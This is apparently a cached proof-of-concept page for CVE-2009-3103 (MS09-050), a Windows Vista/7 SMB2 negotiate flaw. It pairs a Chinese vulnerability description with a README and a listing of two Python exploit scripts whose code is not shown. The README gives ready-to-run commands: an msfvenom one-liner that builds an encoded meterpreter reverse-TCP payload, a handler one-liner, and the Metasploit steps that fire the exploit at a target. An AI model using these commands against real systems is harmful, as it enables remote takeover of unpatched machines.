CVE-2009-3103 PoC — Microsoft Windows Vista和Windows 7畸形SMB报文远程拒绝服务漏洞

Source

https://github.com/sec13b/ms09-050_CVE-2009-3103

Associated Vulnerability

Title:Microsoft Windows Vista和Windows 7畸形SMB报文远程拒绝服务漏洞 (CVE-2009-3103)
Description:Windows是微软发布的非常流行的操作系统。 Windows Vista捆绑了新版的SMB2，SRV2.SYS驱动没有正确地处理发送给NEGOTIATE PROTOCOL REQUEST功能的畸形SMB头，如果远程攻击者在发送的SMB报文的Process Id High头字段中包含有"&"字符的话，就会在_Smb2ValidateProviderCallback()函数中触发越界内存引用，导致执行任意代码或系统蓝屏死机。

Description

CVE-2009-3103 ms09-050

Readme

# ms09-050_CVE-2009-3103<br />
CVE-2009-3103 ms09-050<br />

<br />
# One liner to create/generate a payload for windows<br />
msfvenom --arch x86 --platform windows --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 --bad-chars “\x00” --encoder x86/shikata_ga_nai --iterations 10 --format exe --out /path/<br />
<br />

# One liner start meterpreter<br />
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST 192.168.1.1;set LPORT 4444;run;"<br />
<br /><br />

msf > search MS09_050 <br />
msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index  <br />
msf exploit(ms09_050_smb2_negotiate_func_index) > options <br />
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp <br />
msf exploit(ms09_050_smb2_negotiate_func_index) > set rhost 192.168.1.1 <br />
msf exploit(ms09_050_smb2_negotiate_func_index) > run 
<br />

File Snapshot


 [4.0K]  /data/pocs/27cbce6c5e8a2c90c2768157a6662c3ce883ae33
├── [4.7K]  MS09_050_2.py
├── [5.9K]  ms09-050.py
└── [ 939]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!